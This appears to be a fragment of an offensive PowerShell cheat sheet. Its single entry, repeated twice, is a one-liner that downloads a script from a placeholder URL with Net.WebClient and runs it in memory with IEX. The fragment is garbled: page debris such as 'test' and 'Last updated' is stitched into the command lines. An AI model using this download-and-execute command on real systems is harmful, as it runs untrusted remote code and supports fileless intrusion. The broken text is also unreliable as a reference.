PowerShell
Download and load script in memory: test
echo IEX(New-Object Net.WebClient).DownloadString('http://url/script.ps1') | powershell -noprofile -Last updated
Download and load script in memory: test
echo IEX(New-Object Net.WebClient).DownloadString('http://url/script.ps1') | powershell -noprofile -Last updated